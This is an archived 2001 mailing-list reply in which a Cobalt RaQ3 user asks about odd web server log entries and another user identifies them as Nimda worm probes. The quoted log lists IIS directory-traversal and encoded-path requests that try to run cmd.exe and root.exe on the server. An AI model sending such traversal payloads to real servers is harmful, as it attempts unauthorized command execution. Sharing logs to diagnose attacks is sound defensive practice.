[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] RaQ3 Web Site Logs

Subject: Re: [cobalt-users] RaQ3 Web Site Logs
From: Chris Fragogiannis <franki@xxxxxxxx>
Date: Fri Sep 28 23:45:05 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

It has to do with NIMDA virus. I had the same requests in the log files.

At 15:57 29/9/2001, you wrote:
>I  have started to see following lines on some of the web site logs of my
>Cobalt RaQ3. I would like some help to know what they are.
>
>Mustafa Cavcar
>mcavcar@xxxxxxxxxx
>
>66.81.76.36 - - [29/Sep/2001:05:05:37 -0400] "GET /scripts/root.exe?/c+dir
>HTTP/1.0" 302 225 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:05:44 -0400] "GET /MSADC/root.exe?/c+dir
>HTTP/1.0" 302 223 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:05:53 -0400] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 233 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:00 -0400] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 233 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:07 -0400] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 249 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:14 -0400] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 302 270 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:18 -0400] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 302 270 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:25 -0400] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
>stem32/cmd.exe?/c+dir HTTP/1.0" 302 298 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:31 -0400] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 250 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:36 -0400] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 232 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:40 -0400] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 250 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:45 -0400] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 250 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:50 -0400] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:55 -0400] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
>66.81.76.36 - - [29/Sep/2001:05:06:59 -0400] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 249 "-"
>"-"
>66.81.76.36 - - [29/Sep/2001:05:07:05 -0400] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 249 "-" "-"
>
>
>_______________________________________________
>cobalt-users mailing list
>cobalt-users@xxxxxxxxxxxxxxx
>To Subscribe or Unsubscribe, please go to:
>http://list.cobalt.com/mailman/listinfo/cobalt-users

References:
- [cobalt-users] RaQ3 Web Site Logs
  - From: Mustafa Cavcar

Prev by Date: [cobalt-users] Is it possible to install Raq2 os software on raq1 server ?
Next by Date: RE: [cobalt-users] where is /bin/bash started? WAS: backing-upusing rsync+ssh
Previous by thread: [cobalt-users] RaQ3 Web Site Logs
Next by thread: RE: [cobalt-users] RaQ3 Web Site Logs

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index